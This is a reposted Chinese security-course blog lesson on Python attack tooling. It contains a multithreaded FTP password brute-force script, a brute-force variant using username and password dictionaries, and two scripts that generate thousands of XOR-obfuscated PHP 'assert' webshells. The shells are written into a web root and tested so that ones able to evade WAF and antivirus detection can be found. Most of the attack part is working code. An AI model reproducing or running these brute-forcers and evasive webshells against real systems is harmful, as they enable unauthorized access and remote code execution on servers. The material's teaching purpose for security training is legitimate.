我是靠谱客的博主 文艺信封,最近开发中收集的这篇文章主要介绍第78天-Python 开发-多线程 Fuzz&Waf 异或免杀&爆思维导图知识点演示案例:涉及资源:,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

思维导图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-prXXhU6B-1651147340917)(image78/78.png)]

知识点

  • 本课知识点:

    协议模块使用,Request 爬虫技术,简易多线程技术,编码技术,Bypass 后门技术

  • 学习目的:

    掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等

演示案例:

Python 开发-简单多线程技术实现脚本

**案例 1-Python 开发-简单多线程技术实现脚本 **

queue,threading 模块使用

quickeasyftpserver.zip

import ftplib
import queue
import threading


def ftp_check():
    while not q.empty():
        dic = q.get()
        dic = dic.split('|')
        username = dic[0]
        password = dic[1]
        ftp = ftplib.FTP()
        try:
            ftp.connect('10.13.135.87', 21)
            ftp.login(username, password)
            ftp.retrlines('list')
            print(username + '|' + password + '--------' + 'Logged in')
            ftp.close()
        except ftplib.all_errors as e:
            ftp.close()
            print(username + '|' + password + '--------' + 'failed')
            pass


if __name__ == '__main__':
    thread = 10
    q = queue.Queue()
    for username in open('user.txt'):
        for password in open('password.txt'):
            username = username.replace('n', '')
            password = password.replace('n', '')
            dlist = username + '|' + password
            q.put(dlist)

    for x in range(thread):
        t = threading.Thread(target=ftp_check)
        t.start()

Python 开发-利用 FTP 模块实现协议爆破脚本

案例 2-Python 开发-利用 FTP 模块实现协议爆破脚本

  • 1.ftplib 模块使用

  • 2.遍历用户及密码字典

  • 3.尝试连接执行命令判断



```python
import ftplib
from ftplib import FTP

ftp=FTP()
for username in open('user.txt'):
    for password in open('password.txt'):
        username = username.replace('n', '')
        password = password.replace('n', '')
        try:
            ftp.connect('10.13.1.81', 21)
            ftp.login(username, password)
            ftp.retrlines('list')
            print(username + '|' + password + '--------'+'Logged in')
            ftp.close()

        except ftplib.all_errors as e:
            ftp.close()
            print(username + '|' + password +'--------'+ 'failed')
            continue
```


[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t9a5YvCG-1651147340918)(image78/78-2.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wOaIYju1-1651147340919)(image78/78-3.png)]

Python 开发-配合 Fuzz 实现免杀异或 Shell 脚本

案例 3-Python 开发-配合 Fuzz 实现免杀异或 Shell 脚本

  • 1.免杀异或 Shell 原理讲解及开发思路(参考及举例:!@,"?等)

  • 2.基于 Fuzz 思路生成大量 Payload 代码并有序命名写入网站文件中

  • 3.基于多线程实现批量访问 Shell 文件并提交测试是否正常连接回显

无字符特征马

PHP异或_

在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或,异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。

ASCII表

Bin(二进制)Oct(八进制)Dec(十进制)Hex(十六进制)缩写/字符解释
0000 00000000x00NUL(null)空字符
0000 00010110x01SOH(start of headline)标题开始
0000 00100220x02STX (start of text)正文开始
0000 00110330x03ETX (end of text)正文结束
0000 01000440x04EOT (end of transmission)传输结束
0000 01010550x05ENQ (enquiry)请求
0000 01100660x06ACK (acknowledge)收到通知
0000 01110770x07BEL (bell)响铃
0000 100001080x08BS (backspace)退格
0000 100101190x09HT (horizontal tab)水平制表符
0000 1010012100x0ALF (NL line feed, new line)换行键
0000 1011013110x0BVT (vertical tab)垂直制表符
0000 1100014120x0CFF (NP form feed, new page)换页键
0000 1101015130x0DCR (carriage return)回车键
0000 1110016140x0ESO (shift out)不用切换
0000 1111017150x0FSI (shift in)启用切换
0001 0000020160x10DLE (data link escape)数据链路转义
0001 0001021170x11DC1 (device control 1)设备控制1
0001 0010022180x12DC2 (device control 2)设备控制2
0001 0011023190x13DC3 (device control 3)设备控制3
0001 0100024200x14DC4 (device control 4)设备控制4
0001 0101025210x15NAK (negative acknowledge)拒绝接收
0001 0110026220x16SYN (synchronous idle)同步空闲
0001 0111027230x17ETB (end of trans. block)结束传输块
0001 1000030240x18CAN (cancel)取消
0001 1001031250x19EM (end of medium)媒介结束
0001 1010032260x1ASUB (substitute)代替
0001 1011033270x1BESC (escape)换码(溢出)
0001 1100034280x1CFS (file separator)文件分隔符
0001 1101035290x1DGS (group separator)分组符
0001 1110036300x1ERS (record separator)记录分隔符
0001 1111037310x1FUS (unit separator)单元分隔符
0010 0000040320x20(space)空格
0010 0001041330x21!叹号
0010 0010042340x22"双引号
0010 0011043350x23#井号
0010 0100044360x24$美元符
0010 0101045370x25%百分号
0010 0110046380x26&和号
0010 0111047390x27闭单引号
0010 1000050400x28(开括号
0010 1001051410x29)闭括号
0010 1010052420x2A*星号
0010 1011053430x2B+加号
0010 1100054440x2C,逗号
0010 1101055450x2D-减号/破折号
0010 1110056460x2E.句号
0010 1111057470x2F/斜杠
0011 0000060480x300字符0
0011 0001061490x311字符1
0011 0010062500x322字符2
0011 0011063510x333字符3
0011 0100064520x344字符4
0011 0101065530x355字符5
0011 0110066540x366字符6
0011 0111067550x377字符7
0011 1000070560x388字符8
0011 1001071570x399字符9
0011 1010072580x3A:冒号
0011 1011073590x3B;分号
0011 1100074600x3C<小于
0011 1101075610x3D=等号
0011 1110076620x3E>大于
0011 1111077630x3F?问号
0100 00000100640x40@电子邮件符号
0100 00010101650x41A大写字母A
0100 00100102660x42B大写字母B
0100 00110103670x43C大写字母C
0100 01000104680x44D大写字母D
0100 01010105690x45E大写字母E
0100 01100106700x46F大写字母F
0100 01110107710x47G大写字母G
0100 10000110720x48H大写字母H
0100 10010111730x49I大写字母I
010010100112740x4AJ大写字母J
0100 10110113750x4BK大写字母K
0100 11000114760x4CL大写字母L
0100 11010115770x4DM大写字母M
0100 11100116780x4EN大写字母N
0100 11110117790x4FO大写字母O
0101 00000120800x50P大写字母P
0101 00010121810x51Q大写字母Q
0101 00100122820x52R大写字母R
0101 00110123830x53S大写字母S
0101 01000124840x54T大写字母T
0101 01010125850x55U大写字母U
0101 01100126860x56V大写字母V
0101 01110127870x57W大写字母W
0101 10000130880x58X大写字母X
0101 10010131890x59Y大写字母Y
0101 10100132900x5AZ大写字母Z
0101 10110133910x5B[开方括号
0101 11000134920x5C反斜杠
0101 11010135930x5D]闭方括号
0101 11100136940x5E^脱字符
0101 11110137950x5F_下划线
0110 00000140960x60`开单引号
0110 00010141970x61a小写字母a
0110 00100142980x62b小写字母b
0110 00110143990x63c小写字母c
0110 010001441000x64d小写字母d
0110 010101451010x65e小写字母e
0110 011001461020x66f小写字母f
0110 011101471030x67g小写字母g
0110 100001501040x68h小写字母h
0110 100101511050x69i小写字母i
0110 101001521060x6Aj小写字母j
0110 101101531070x6Bk小写字母k
0110 110001541080x6Cl小写字母l
0110 110101551090x6Dm小写字母m
0110 111001561100x6En小写字母n
0110 111101571110x6Fo小写字母o
0111 000001601120x70p小写字母p
0111 000101611130x71q小写字母q
0111 001001621140x72r小写字母r
0111 001101631150x73s小写字母s
0111 010001641160x74t小写字母t
0111 010101651170x75u小写字母u
0111 011001661180x76v小写字母v
0111 011101671190x77w小写字母w
0111 100001701200x78x小写字母x
0111 100101711210x79y小写字母y
0111 101001721220x7Az小写字母z
0111 101101731230x7B{开花括号
0111 110001741240x7C|垂线
0111 110101751250x7D}闭花括号
0111 111001761260x7E~波浪号
0111 111101771270x7FDEL (delete)删除
0010 0001      33       !  
0010 1000      40		(
异或运算

0000 1001      9

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rSzWSbDA-1651147340919)(image78/78-4.png)]

手工测试

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zoDVHo2l-1651147340920)(image78/78-5.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1ztM02ze-1651147340920)(image78/78-6.png)]

bypass脚本

""""
php异或
PHP之异或运算符---"^"
一.当均为数字时候
则先将数字转换成二进制数,然后再运算,运算规则也简单!
就是:
同则0,不同则1:运算的两个数在同一个位上相同则为0,不相同则为1!

二.当均为字符时
则先将字符转换成其对应的ASCII码,然后对产生的数字进行绝对值减运算!然后返回值转换成对应的字符!
如果两字符串长度不一样,则从两字符串起始位置起开始计算!之后多余的自动转换为空(视为一样)!

"""

import requests
import time

def xor_shell_creat():
    for i in range(0, 128):
        for j in range(0, 128):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(j) + "'"
            shell = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            # print(shell)
            filename = str(i) + 'xor' + str(j) + '.php'
            with open('E:/phpstudy/PHPTutorial/WWW/test/' + filename, 'a') as f:
                f.write(shell)
                print(filename + '写入成功')
                f.close()
            url='http://127.0.0.1/test/'+filename
            data={
                'x':'phpinfo();'
            }
            result = requests.post(url,data=data).content.decode('utf-8')
            if 'DESKTOP-1CDDLPV' in result:
                print('check->' + filename + '->ok')
            else:
                print('check->' + filename + '->no')
            # time.sleep(1)

if __name__ == '__main__':
    xor_shell_creat()



[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gY13eQTg-1651147340921)(image78/78-7.png)]

生成的shell很多!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xK488HcU-1651147340922)(image78/78-8.png)]

bypassplus脚本

多进程—莫名速度好垃(不知道为什么好慢!哈哈)

import queue

import requests
import time
import threading

def xor_shell_check():
    while not q.empty():
        filename = q.get()
        url = 'http://127.0.0.1/test/' + filename
        data = {
            'x': 'phpinfo();'
        }
        result = requests.post(url, data=data).content.decode('utf-8')
        if 'DESKTOP-1CDDLPV' in result:
            print('check->' + filename + '->ok')
        else:
            print('check->' + filename + '->no')
        time.sleep(1)



if __name__ == '__main__':
    q=queue.Queue()
    for i in range(0, 128):
        for j in range(0, 128):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(j) + "'"
            shell = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            # print(shell)
            filename = str(i) + 'xor' + str(j) + '.php'
            q.put(filename)
            with open('E:/phpstudy/PHPTutorial/WWW/test/' + filename, 'a') as f:
                f.write(shell)
                print(filename + '写入成功')
                f.close()
    for x in range(10):
        t = threading.Thread(target=xor_shell_check)
        t.start()

涉及资源:

quickeasyftpserver.zip
https://github.com/zhanye/fuzzdb
https://github.com/stemmm/fuzzDicts
https://www.cnblogs.com/liujizhou/p/11806497.html
python ftplib模块
https://blog.csdn.net/qq_41617034/article/details/104441032
https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码:
xiao

最后

以上就是文艺信封为你收集整理的第78天-Python 开发-多线程 Fuzz&Waf 异或免杀&爆思维导图知识点演示案例:涉及资源:的全部内容,希望文章能够帮你解决第78天-Python 开发-多线程 Fuzz&Waf 异或免杀&爆思维导图知识点演示案例:涉及资源:所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(42)

评论列表共有 0 条评论

立即
投稿
返回
顶部